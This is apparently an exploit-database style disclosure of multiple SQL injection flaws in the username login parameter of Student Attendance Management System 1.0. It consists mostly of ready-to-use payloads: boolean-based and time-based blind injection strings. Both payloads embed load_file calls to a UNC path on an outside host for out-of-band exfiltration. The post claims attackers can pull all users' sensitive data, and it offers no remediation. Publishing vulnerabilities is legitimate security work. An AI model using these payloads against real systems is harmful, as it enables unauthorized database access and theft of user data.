Student Attendance Management System 1.0 SQL Injection

`## Title: Student-Attendance-Management-System 1.0 from Erick O. Omundi Multiple-SQLi  
## Author: nu11secur1ty  
## Date: 12.25.2022  
## Vendor: https://github.com/rickxy  
## Software: https://github.com/rickxy/Student-Attendance-Management-System  
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rickxy/2022/Student-Attendance-Management-System  
  
## Description:  
The `username` parameter appears to be vulnerable to Multiple-SQL  
injection attacks.  
The attacker can retrieve all sensitive information about the users of  
this system and more bad things.  
  
## STATUS: CRITICAL Vulnerability  
  
[+] Payload:  
  
```MySQL  
---  
Parameter: username (POST)  
Type: boolean-based blind  
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY  
or GROUP BY clause  
Payload: userType=Administrator&username=lBPxXeUT'+(select  
load_file('\\\\eq8r4p3b9u6gn42v38f6ca4cf3lw9oxf03sqje8.erick_from_America.com\\khw'))+''  
RLIKE (SELECT (CASE WHEN (6217=6217) THEN 0x6c42507858655554+(select  
load_file(0x5c5c5c5c6571387234703362397536676e343276333866366361346366336c77396f7866303373716a65382e657269636b5f66726f6d5f416d65726963612e636f6d5c5c6b6877))+''  
ELSE 0x28 END)) AND 'FUJm'='FUJm&password=q2H!z4n!F1&login=Login  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: userType=Administrator&username=lBPxXeUT'+(select  
load_file('\\\\eq8r4p3b9u6gn42v38f6ca4cf3lw9oxf03sqje8.erick_from_America.com\\khw'))+''  
AND (SELECT 8687 FROM (SELECT(SLEEP(7)))btHE) AND  
'XFcq'='XFcq&password=q2H!z4n!F1&login=Login  
---  
```  
  
## Reproduce:  
[href]()https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rickxy/2022/Student-Attendance-Management-System  
  
## Proof and Exploit:  
[href](https://streamable.com/goy6ka)  
  
## Time spent  
`00:30:00`  
  
`